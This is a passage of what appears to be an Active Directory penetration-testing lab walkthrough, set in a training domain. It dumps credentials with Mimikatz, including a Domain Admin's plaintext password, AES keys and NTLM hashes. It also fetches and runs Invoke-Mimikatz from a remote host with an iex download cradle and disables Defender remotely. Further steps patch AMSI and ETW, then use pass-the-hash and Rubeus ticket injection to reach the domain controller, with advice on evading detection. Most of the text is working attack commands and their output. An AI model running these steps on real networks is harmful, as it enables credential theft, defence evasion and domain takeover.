rc4_hmac_nt_exp 95e2cd7ff77379e34c6e46265e75d754
rc4_hmac_old_exp 95e2cd7ff77379e34c6e46265e75d754

Authentication Id : 0 ; 288282 (00000000:0004661a)


Session : Interactive from 2
User Name : UMFD-2
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 2/21/2024 3:20:28 AM
SID : S-1-5-96-0-2

* Username : DCORP-MGMT$
* Domain : dollarcorp.moneycorp.local
* Password :
4?PhChKP(`?yW`E8=VM2QI13O!i*3Q?WVB"X)=>Il3=AczJ0^T!X]r&:&yG41`*/$^4+EeZ07?zF2Z3`:[Jd*F/z_P`p6B9XH
^g$*mXIQMXY(Sc?3\A6ICrX
* Key List :
aes256_hmac c71f382ea61f80cab751aada32a477b7f9617f3b4a8628dc1c8757db5fdb5076
aes128_hmac b3b9f96ed137fb4c079dcfe2e23f7854
rc4_hmac_nt 0878da540f45b31b974f73312c18e754
rc4_hmac_old 0878da540f45b31b974f73312c18e754
rc4_md4 0878da540f45b31b974f73312c18e754
rc4_hmac_nt_exp 0878da540f45b31b974f73312c18e754
rc4_hmac_old_exp 0878da540f45b31b974f73312c18e754

Authentication Id : 0 ; 20803 (00000000:00005143)


Session : Interactive from 1
User Name : UMFD-1
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 2/21/2024 3:15:49 AM
SID : S-1-5-96-0-1

* Username : DCORP-MGMT$
* Domain : dollarcorp.moneycorp.local
* Password :
4?PhChKP(`?yW`E8=VM2QI13O!i*3Q?WVB"X)=>Il3=AczJ0^T!X]r&:&yG41`*/$^4+EeZ07?zF2Z3`:[Jd*F/z_P`p6B9XH
^g$*mXIQMXY(Sc?3\A6ICrX
* Key List :
aes256_hmac c71f382ea61f80cab751aada32a477b7f9617f3b4a8628dc1c8757db5fdb5076
aes128_hmac b3b9f96ed137fb4c079dcfe2e23f7854
rc4_hmac_nt 0878da540f45b31b974f73312c18e754
rc4_hmac_old 0878da540f45b31b974f73312c18e754
rc4_md4 0878da540f45b31b974f73312c18e754
rc4_hmac_nt_exp 0878da540f45b31b974f73312c18e754
rc4_hmac_old_exp 0878da540f45b31b974f73312c18e754

Authentication Id : 0 ; 999 (00000000:000003e7)


Session : UndefinedLogonType from 0
User Name : DCORP-MGMT$
Domain : dcorp
Logon Server : (null)
Logon Time : 2/21/2024 3:15:48 AM
SID : S-1-5-18

* Username : dcorp-mgmt$
* Domain : DOLLARCORP.MONEYCORP.LOCAL
* Password : (null)
* Key List :
aes256_hmac b607d794f87ca117a14353da0dbb6f27bbe9fed4f1ce1b810b43fbb9a2eab192
rc4_hmac_nt 0878da540f45b31b974f73312c18e754
rc4_hmac_old 0878da540f45b31b974f73312c18e754
rc4_md4 0878da540f45b31b974f73312c18e754
rc4_hmac_nt_exp 0878da540f45b31b974f73312c18e754
rc4_hmac_old_exp 0878da540f45b31b974f73312c18e754

mimikatz(commandline) # exit
Bye!

Note: When we dump credentials with Mimikatz, we get multiple AES keys for the machine account. The
correct AES keys for the machine account are the ones listed under the session with SID S-1-5-18.

Method – 2
We will use Invoke-Mimikatz.ps1 to dump all the credentials from the machine DCORP-MGMT. For this
we will download Invoke-Mimikatz.ps1 and execute it on DCORP-CI. We will create an interactive session
with the machine DCORP-MGMT and disable defender on DCORP-MGMT. Then we will execute the
function Invoke-Mimikatz on the machine DCORP-MGMT to dump the credentials.

Step-1: Download Invoke-Mimikatz.ps1 and execute it on DCORP-CI.

PS C:\Users\Public> iex((New-Object Net.WebClient).DownloadString('http://172.16.100.163/Invoke-Mimikatz.ps1'))

Step-2: Create an Interactive Session on DCORP-MGMT and disable Defender.

PS C:\Users\Public> $Session = New-PSSession -Computername dcorp-mgmt.dollarcorp.moneycorp.local
PS C:\Users\Public> Invoke-Command -Session $Session -ScriptBlock { Set-MpPreference -DisableRealtimeMonitoring $true }
PS C:\Users\Public> Invoke-Command -Session $Session -ScriptBlock { Set-MpPreference -DisableBehaviorMonitoring $true }
PS C:\Users\Public> Invoke-Command -Session $Session -ScriptBlock { Set-MpPreference -DisableIntrusionPreventionSystem $true }
PS C:\Users\Public> Invoke-Command -Session $Session -ScriptBlock { Set-MpPreference -DisableIOAVProtection $true }

Step-3: Executing the function Invoke-Mimikatz to dump credentials

Since we have executed the PowerShell script Invoke-Mimikatz.ps1 on the machine DCORP-CI, the
function Invoke-Mimikatz is available in the memory of DCORP-CI. We will execute the same function
on the machine DCORP-MGMT using the session we opened previously.
PS C:\Users\Public> Invoke-Command -Session $Session -ScriptBlock ${Function:Invoke-Mimikatz}

.#####. mimikatz 2.2.0 (x64) #19041 Sep 20 2021 19:01:18


.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(powershell) # sekurlsa::ekeys

Authentication Id : 0 ; 56541 (00000000:0000dcdd)


Session : Service from 0
User Name : svcadmin
Domain : dcorp
Logon Server : DCORP-DC
Logon Time : 2/21/2024 3:15:55 AM
SID : S-1-5-21-719815819-3726368948-3917688648-1118

* Username : svcadmin
* Domain : DOLLARCORP.MONEYCORP.LOCAL
* Password : *ThisisBlasphemyThisisMadness!!
* Key List :
des_cbc_md4 6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011
des_cbc_md4 8c0a8695795df6c9a85c4fb588ad6cbd
des_cbc_md4 b38ff50264b74508085d82c69794a4d8
des_cbc_md4 b38ff50264b74508085d82c69794a4d8
des_cbc_md4 b38ff50264b74508085d82c69794a4d8
des_cbc_md4 b38ff50264b74508085d82c69794a4d8
des_cbc_md4 b38ff50264b74508085d82c69794a4d8

Authentication Id : 0 ; 54690 (00000000:0000d5a2)


Session : Service from 0
User Name : SQLTELEMETRY
Domain : NT Service
Logon Server : (null)
Logon Time : 2/21/2024 3:15:54 AM
SID : S-1-5-80-2652535364-2169709536-2857650723-2622804123-1107741775

* Username : DCORP-MGMT$
* Domain : dollarcorp.moneycorp.local
* Password :
4?PhChKP(`?yW`E8=VM2QI13O!i*3Q?WVB"X)=>Il3=AczJ0^T!X]r&:&yG41`*/$^4+EeZ07?zF2Z3`:[Jd*F/z_P`p6B9XH
^g$*mXIQMXY(Sc?3\A6ICrX
* Key List :
des_cbc_md4 c71f382ea61f80cab751aada32a477b7f9617f3b4a8628dc1c8757db5fdb5076
des_cbc_md4 b3b9f96ed137fb4c079dcfe2e23f7854
des_cbc_md4 0878da540f45b31b974f73312c18e754
des_cbc_md4 0878da540f45b31b974f73312c18e754
des_cbc_md4 0878da540f45b31b974f73312c18e754
des_cbc_md4 0878da540f45b31b974f73312c18e754
des_cbc_md4 0878da540f45b31b974f73312c18e754

Authentication Id : 0 ; 996 (00000000:000003e4)


Session : Service from 0
User Name : DCORP-MGMT$
Domain : dcorp
Logon Server : (null)
Logon Time : 2/21/2024 3:15:49 AM
SID : S-1-5-20

* Username : dcorp-mgmt$
* Domain : DOLLARCORP.MONEYCORP.LOCAL
* Password : (null)
* Key List :
des_cbc_md4 b607d794f87ca117a14353da0dbb6f27bbe9fed4f1ce1b810b43fbb9a2eab192
des_cbc_md4 0878da540f45b31b974f73312c18e754
des_cbc_md4 0878da540f45b31b974f73312c18e754
des_cbc_md4 0878da540f45b31b974f73312c18e754
des_cbc_md4 0878da540f45b31b974f73312c18e754
des_cbc_md4 0878da540f45b31b974f73312c18e754

Authentication Id : 0 ; 20862 (00000000:0000517e)


Session : Interactive from 0
User Name : UMFD-0
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 2/21/2024 3:15:49 AM
SID : S-1-5-96-0-0

* Username : DCORP-MGMT$
* Domain : dollarcorp.moneycorp.local
* Password :
4?PhChKP(`?yW`E8=VM2QI13O!i*3Q?WVB"X)=>Il3=AczJ0^T!X]r&:&yG41`*/$^4+EeZ07?zF2Z3`:[Jd*F/z_P`p6B9XH
^g$*mXIQMXY(Sc?3\A6ICrX
* Key List :
des_cbc_md4 c71f382ea61f80cab751aada32a477b7f9617f3b4a8628dc1c8757db5fdb5076
des_cbc_md4 b3b9f96ed137fb4c079dcfe2e23f7854
des_cbc_md4 0878da540f45b31b974f73312c18e754
des_cbc_md4 0878da540f45b31b974f73312c18e754
des_cbc_md4 0878da540f45b31b974f73312c18e754
des_cbc_md4 0878da540f45b31b974f73312c18e754
des_cbc_md4 0878da540f45b31b974f73312c18e754

Authentication Id : 0 ; 1027589 (00000000:000fae05)


Session : Interactive from 0
User Name : mgmtadmin
Domain : dcorp
Logon Server : DCORP-DC
Logon Time : 2/21/2024 3:57:38 AM
SID : S-1-5-21-719815819-3726368948-3917688648-1120

* Username : mgmtadmin
* Domain : DOLLARCORP.MONEYCORP.LOCAL
* Password : (null)
* Key List :
des_cbc_md4 902129307ec94942b00c6b9d866c67a2376f596bc9bdcf5f85ea83176f97c3aa
des_cbc_md4 95e2cd7ff77379e34c6e46265e75d754
des_cbc_md4 95e2cd7ff77379e34c6e46265e75d754
des_cbc_md4 95e2cd7ff77379e34c6e46265e75d754
des_cbc_md4 95e2cd7ff77379e34c6e46265e75d754
des_cbc_md4 95e2cd7ff77379e34c6e46265e75d754

Authentication Id : 0 ; 359605 (00000000:00057cb5)


Session : RemoteInteractive from 2
User Name : mgmtadmin
Domain : dcorp
Logon Server : DCORP-DC
Logon Time : 2/21/2024 3:25:49 AM
SID : S-1-5-21-719815819-3726368948-3917688648-1120

* Username : mgmtadmin
* Domain : DOLLARCORP.MONEYCORP.LOCAL
* Password : (null)
* Key List :
des_cbc_md4 902129307ec94942b00c6b9d866c67a2376f596bc9bdcf5f85ea83176f97c3aa
des_cbc_md4 95e2cd7ff77379e34c6e46265e75d754
des_cbc_md4 95e2cd7ff77379e34c6e46265e75d754
des_cbc_md4 95e2cd7ff77379e34c6e46265e75d754
des_cbc_md4 95e2cd7ff77379e34c6e46265e75d754
des_cbc_md4 95e2cd7ff77379e34c6e46265e75d754

Authentication Id : 0 ; 288282 (00000000:0004661a)


Session : Interactive from 2
User Name : UMFD-2
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 2/21/2024 3:20:28 AM
SID : S-1-5-96-0-2

* Username : DCORP-MGMT$
* Domain : dollarcorp.moneycorp.local
* Password :
4?PhChKP(`?yW`E8=VM2QI13O!i*3Q?WVB"X)=>Il3=AczJ0^T!X]r&:&yG41`*/$^4+EeZ07?zF2Z3`:[Jd*F/z_P`p6B9XH
^g$*mXIQMXY(Sc?3\A6ICrX
* Key List :
des_cbc_md4 c71f382ea61f80cab751aada32a477b7f9617f3b4a8628dc1c8757db5fdb5076
des_cbc_md4 b3b9f96ed137fb4c079dcfe2e23f7854
des_cbc_md4 0878da540f45b31b974f73312c18e754
des_cbc_md4 0878da540f45b31b974f73312c18e754
des_cbc_md4 0878da540f45b31b974f73312c18e754
des_cbc_md4 0878da540f45b31b974f73312c18e754
des_cbc_md4 0878da540f45b31b974f73312c18e754

Authentication Id : 0 ; 20803 (00000000:00005143)


Session : Interactive from 1
User Name : UMFD-1
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 2/21/2024 3:15:49 AM
SID : S-1-5-96-0-1

* Username : DCORP-MGMT$
* Domain : dollarcorp.moneycorp.local
* Password :
4?PhChKP(`?yW`E8=VM2QI13O!i*3Q?WVB"X)=>Il3=AczJ0^T!X]r&:&yG41`*/$^4+EeZ07?zF2Z3`:[Jd*F/z_P`p6B9XH
^g$*mXIQMXY(Sc?3\A6ICrX
* Key List :
des_cbc_md4 c71f382ea61f80cab751aada32a477b7f9617f3b4a8628dc1c8757db5fdb5076
des_cbc_md4 b3b9f96ed137fb4c079dcfe2e23f7854
des_cbc_md4 0878da540f45b31b974f73312c18e754
des_cbc_md4 0878da540f45b31b974f73312c18e754
des_cbc_md4 0878da540f45b31b974f73312c18e754
des_cbc_md4 0878da540f45b31b974f73312c18e754
des_cbc_md4 0878da540f45b31b974f73312c18e754

Authentication Id : 0 ; 999 (00000000:000003e7)


Session : UndefinedLogonType from 0
User Name : DCORP-MGMT$
Domain : dcorp
Logon Server : (null)
Logon Time : 2/21/2024 3:15:48 AM
SID : S-1-5-18

* Username : dcorp-mgmt$
* Domain : DOLLARCORP.MONEYCORP.LOCAL
* Password : (null)
* Key List :
des_cbc_md4 b607d794f87ca117a14353da0dbb6f27bbe9fed4f1ce1b810b43fbb9a2eab192
des_cbc_md4 0878da540f45b31b974f73312c18e754
des_cbc_md4 0878da540f45b31b974f73312c18e754
des_cbc_md4 0878da540f45b31b974f73312c18e754
des_cbc_md4 0878da540f45b31b974f73312c18e754
des_cbc_md4 0878da540f45b31b974f73312c18e754
mimikatz(powershell) # exit
Bye!

We have obtained the following hashes.

Username      AES Hashes
svcadmin      6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011
mgmtadmin     902129307ec94942b00c6b9d866c67a2376f596bc9bdcf5f85ea83176f97c3aa
DCORP-MGMT$   c71f382ea61f80cab751aada32a477b7f9617f3b4a8628dc1c8757db5fdb5076

Username      NTLM Hashes
svcadmin      b38ff50264b74508085d82c69794a4d8
mgmtadmin     95e2cd7ff77379e34c6e46265e75d754
DCORP-MGMT$   0878da540f45b31b974f73312c18e754

Since we have the hashes of the svcadmin (Domain Admin), we will execute an OverPass the Hash attack.

OverPass the Hash Attack


Invoke-Mimi
Using NTLM hash
The following command starts a powershell.exe whose network credentials are built from the user's NTLM hash. Because sekurlsa::pth writes the credential material into LSASS memory, it must be run from an elevated (local administrator) context.
Invoke-Mimikatz -Command '"sekurlsa::pth /user:<username> /domain:<Domain> /ntlm:<NTLM Hash of the user> /run:powershell.exe"'

C:\Windows\system32>c:\AD\Tools\InviShell\RunWithPathAsAdmin.bat

C:\Windows\system32>set COR_ENABLE_PROFILING=1

C:\Windows\system32>set COR_PROFILER={cf0d821e-299b-5307-a3d8-b283c03916db}

C:\Windows\system32>set COR_PROFILER_PATH=c:\AD\Tools\InviShell\InShellProf.dll

C:\Windows\system32>powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\Windows\system32> . C:\Ad\Tools\Invoke-Mimi.ps1
PS C:\Windows\system32> Invoke-Mimi -Command '"sekurlsa::pth /user:svcadmin /domain:dollarcorp.moneycorp.local /ntlm:b38ff50264b74508085d82c69794a4d8 /run:powershell.exe"'

.#####. mimikatz 2.2.0 (x64) #19041 Dec 23 2022 18:36:14


.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(powershell) # sekurlsa::pth /user:svcadmin /domain:dollarcorp.moneycorp.local /ntlm:b38ff50264b74508085d82c69794a4d8 /run:powershell.exe
user : svcadmin
domain : dollarcorp.moneycorp.local
program : powershell.exe
impers. : no
NTLM : b38ff50264b74508085d82c69794a4d8
| PID 4284
| TID 6044
| LSA Process is now R/W
| LUID 0 ; 99381950 (00000000:05ec72be)
\_ msv1_0 - data copy @ 000002951FD99470 : OK !
\_ kerberos - data copy @ 000002952037A368
\_ aes256_hmac -> null
\_ aes128_hmac -> null
\_ rc4_hmac_nt OK
\_ rc4_hmac_old OK
\_ rc4_md4 OK
\_ rc4_hmac_nt_exp OK
\_ rc4_hmac_old_exp OK
\_ *Password replace @ 0000029520326AA8 (32) -> null

A new PowerShell session opens. As already mentioned, the new powershell.exe runs under a logon type 9 (NewCredentials) logon, the same kind that runas /netonly creates: local actions still use the original token (student163), while any network authentication uses the injected credentials. Note in the output above that with /ntlm only the rc4_* keys were populated (aes256_hmac -> null), so every TGT this process requests will be RC4-encrypted.

The following commands are executed in the new PowerShell Window.


PS C:\Windows\system32> $env:username
student163
PS C:\Windows\system32> Invoke-Command -ComputerName dcorp-dc -ScriptBlock {
$env:username;$env:computername }
svcadmin
DCORP-DC
PS C:\Windows\system32> winrs -r:dcorp-dc cmd.exe
Microsoft Windows [Version 10.0.20348.2227]
(c) Microsoft Corporation. All rights reserved.

C:\Users\svcadmin>set username
set username
USERNAME=svcadmin

C:\Users\svcadmin>set computername
set computername
COMPUTERNAME=DCORP-DC

Using AES hash


Invoke-Mimikatz -Command '"sekurlsa::pth /user:<user to impersonate> /domain:<domain> /aes256:<aes256 key of the user> /run:powershell.exe"'

PS C:\Windows\system32> Invoke-Mimi -Command '"sekurlsa::pth /user:svcadmin /domain:dollarcorp.moneycorp.local /aes256:6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011 /run:powershell.exe"'
.#####. mimikatz 2.2.0 (x64) #19041 Dec 23 2022 18:36:14
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(powershell) # sekurlsa::pth /user:svcadmin /domain:dollarcorp.moneycorp.local /aes256:6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011 /run:powershell.exe
user : svcadmin
domain : dollarcorp.moneycorp.local
program : powershell.exe
impers. : no
AES256 : 6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011
| PID 5828
| TID 3432
| LSA Process is now R/W
| LUID 0 ; 101327957 (00000000:060a2455)
\_ msv1_0 - data copy @ 000002951FD99270 : OK !
\_ kerberos - data copy @ 000002952037A588
\_ aes256_hmac OK
\_ aes128_hmac -> null
\_ rc4_hmac_nt -> null
\_ rc4_hmac_old -> null
\_ rc4_md4 -> null
\_ rc4_hmac_nt_exp -> null
\_ rc4_hmac_old_exp -> null
\_ *Password replace @ 0000029520326DE8 (32) -> null

A new PowerShell session opens, again as a logon type 9 process: local resources still see the original username and network resources see svcadmin. This time the output shows aes256_hmac OK with the RC4 keys null, so Kerberos traffic from this process uses AES256 like a normal domain-joined Windows client. The following commands are executed in the new PowerShell window.
PS C:\Windows\system32> $env:username
student163
PS C:\Windows\system32> $env:computername
DCORP-STD163
PS C:\Windows\system32> Invoke-Command -ComputerName dcorp-dc -ScriptBlock {
$env:username;$env:computername }
svcadmin
DCORP-DC

SafetyKatz
The following command starts a powershell.exe with the user's credentials. As with Invoke-Mimikatz, sekurlsa::pth patches LSASS, so administrative privileges are required.
SafetyKatz.exe "sekurlsa::pth /user:<user to impersonate> /domain:<domain> /aes256:<aes256 key of the user> /run:powershell.exe" "exit"

C:\Windows\system32>C:\Ad\Tools\InviShell\RunWithPathAsAdmin.bat

C:\Windows\system32>set COR_ENABLE_PROFILING=1
C:\Windows\system32>set COR_PROFILER={cf0d821e-299b-5307-a3d8-b283c03916db}

C:\Windows\system32>set COR_PROFILER_PATH=C:\AD\Tools\InviShell\InShellProf.dll

C:\Windows\system32>powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\Windows\system32> C:\AD\Tools\Loader.exe -Path "C:\AD\Tools\old_tools\SafetyKatz.exe" "sekurlsa::pth /user:svcadmin /domain:dollarcorp.moneycorp.local /aes256:6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011 /run:powershell.exe" "exit"
[*] Applying amsi patch: true
[*] Applying etw patch: true
[*] Decrypting packed exe...
[!] ~Flangvik - Arno0x0x Edition - #NetLoader
[+] Patched!
[+] Starting C:\AD\Tools\old_tools\SafetyKatz.exe with args ''

.#####. mimikatz 2.2.0 (x64) #19041 Dec 23 2022 16:49:51


.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # -Path
ERROR mimikatz_doLocal ; "-Path" command of "standard" module not found !

Module : standard
Full name : Standard module
Description : Basic commands (does not require module name)

exit - Quit mimikatz


cls - Clear screen (doesn't work with redirections, like PsExec)
answer - Answer to the Ultimate Question of Life, the Universe, and Everything
coffee - Please, make me a coffee!
sleep - Sleep an amount of milliseconds
log - Log mimikatz input/output to file
base64 - Switch file input/output base64
version - Display some version informations
cd - Change or display current directory
localtime - Displays system local date and time (OJ command)
hostname - Displays system local hostname

mimikatz(commandline) # C:\AD\Tools\old_tools\SafetyKatz.exe
ERROR mimikatz_doLocal ; "C:\AD\Tools\old_tools\SafetyKatz.exe" command of "standard" module not
found !

Module : standard
Full name : Standard module
Description : Basic commands (does not require module name)

exit - Quit mimikatz


cls - Clear screen (doesn't work with redirections, like PsExec)
answer - Answer to the Ultimate Question of Life, the Universe, and Everything
coffee - Please, make me a coffee!
sleep - Sleep an amount of milliseconds
log - Log mimikatz input/output to file
base64 - Switch file input/output base64
version - Display some version informations
cd - Change or display current directory
localtime - Displays system local date and time (OJ command)
hostname - Displays system local hostname

mimikatz(commandline) # sekurlsa::pth /user:svcadmin /domain:dollarcorp.moneycorp.local /aes256:6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011 /run:powershell.exe
user : svcadmin
domain : dollarcorp.moneycorp.local
program : powershell.exe
impers. : no
AES256 : 6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011
| PID 3304
| TID 4784
| LSA Process is now R/W
| LUID 0 ; 109243099 (00000000:0682eadb)
\_ msv1_0 - data copy @ 000002951FD9A470 : OK !
\_ kerberos - data copy @ 0000029520379AE8
\_ aes256_hmac OK
\_ aes128_hmac -> null
\_ rc4_hmac_nt -> null
\_ rc4_hmac_old -> null
\_ rc4_md4 -> null
\_ rc4_hmac_nt_exp -> null
\_ rc4_hmac_old_exp -> null
\_ *Password replace @ 0000029520326AA8 (32) -> null

mimikatz(commandline) # exit
Bye!

A new PowerShell session opens. The two "command ... not found" errors above are harmless: the loader handed -Path and the SafetyKatz path to mimikatz as commands as well, mimikatz rejected those two tokens and then executed the sekurlsa::pth command. The following commands are executed in the new PowerShell window.
PS C:\Windows\system32> $env:computername
DCORP-STD163
PS C:\Windows\system32> $env:username
student163
PS C:\Windows\system32> Invoke-Command -ComputerName dcorp-dc -ScriptBlock {
$env:username;$env:computername }
svcadmin
DCORP-DC

Rubeus
Using NTLM hash
Rubeus is run from a command prompt. The following command does not need administrative privileges: it requests the TGT from the DC over the network itself and injects the ticket into the caller's own logon session, without touching LSASS memory.

Rubeus.exe asktgt /user:<username> /rc4:<NTLM hash> /ptt

The /ptt parameter injects the returned ticket into the current logon session. Using /rc4 means the AS-REQ and the resulting TGT use RC4-HMAC (etype 0x17). In a domain where the account has AES keys that is an encryption downgrade that stands out in the DC's 4768 events, which is why the AES256 form with /opsec shown below is preferred when stealth matters.
C:\Users\student163>C:\Ad\Tools\Rubeus.exe asktgt /user:svcadmin
/rc4:b38ff50264b74508085d82c69794a4d8 /ptt

______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/

v2.2.1

[*] Action: Ask TGT

[*] Using rc4_hmac hash: b38ff50264b74508085d82c69794a4d8


[*] Building AS-REQ (w/ preauth) for: 'dollarcorp.moneycorp.local\svcadmin'
[*] Using domain controller: 172.16.2.1:88
[+] TGT request successful!
[*] base64(ticket.kirbi):

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
cC5sb2NhbA==
[+] Ticket successfully imported!

ServiceName : krbtgt/dollarcorp.moneycorp.local
ServiceRealm : DOLLARCORP.MONEYCORP.LOCAL
UserName : svcadmin
UserRealm : DOLLARCORP.MONEYCORP.LOCAL
StartTime : 6/24/2024 4:32:12 AM
EndTime : 6/24/2024 2:32:12 PM
RenewTill : 7/1/2024 4:32:12 AM
Flags : name_canonicalize, pre_authent, initial, renewable, forwardable
KeyType : rc4_hmac
Base64(key) : acc4fDXA0FcZHU9mOKRKCw==
ASREP (key) : B38FF50264B74508085D82C69794A4D8
C:\Users\student163>dir \\dcorp-dc.dollarcorp.moneycorp.local\C$
Volume in drive \\dcorp-dc.dollarcorp.moneycorp.local\C$ has no label.
Volume Serial Number is 1A5A-FDE2

Directory of \\dcorp-dc.dollarcorp.moneycorp.local\C$

05/08/2021 01:20 AM <DIR> PerfLogs


11/14/2022 11:12 PM <DIR> Program Files
05/08/2021 02:40 AM <DIR> Program Files (x86)
05/18/2024 01:32 AM <DIR> Users
01/10/2024 01:59 AM <DIR> Windows
0 File(s) 0 bytes
5 Dir(s) 6,478,733,312 bytes free
C:\Users\student163>winrs -r:dcorp-dc cmd.exe
Microsoft Windows [Version 10.0.20348.2227]
(c) Microsoft Corporation. All rights reserved.

C:\Users\svcadmin>set username
set username
USERNAME=svcadmin

C:\Users\svcadmin>set computername
set computername
COMPUTERNAME=DCORP-DC

Using AES hash

The following command requires elevation. /opsec makes Rubeus behave like a Windows client (an initial AS-REQ without pre-authentication, the expected KDC_ERR_PREAUTH_REQUIRED reply, then an AES-only AS-REQ with pre-authentication; the "Pre-Authentication required!" line in the output below is that first exchange). /createnetonly starts the given process under a logon type 9 (netonly) logon, /show keeps its window visible, and /ptt then injects the TGT into that new process's logon session (the Target LUID in the output) rather than into the current one.
Rubeus.exe asktgt /user:<username> /aes256:<aes key> /opsec /createnetonly:<Process to start> /show /ptt

C:\Windows\system32>C:\Ad\Tools\Rubeus.exe asktgt /user:svcadmin /aes256:6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011 /opsec /createnetonly:cmd.exe /show /ptt

______ _
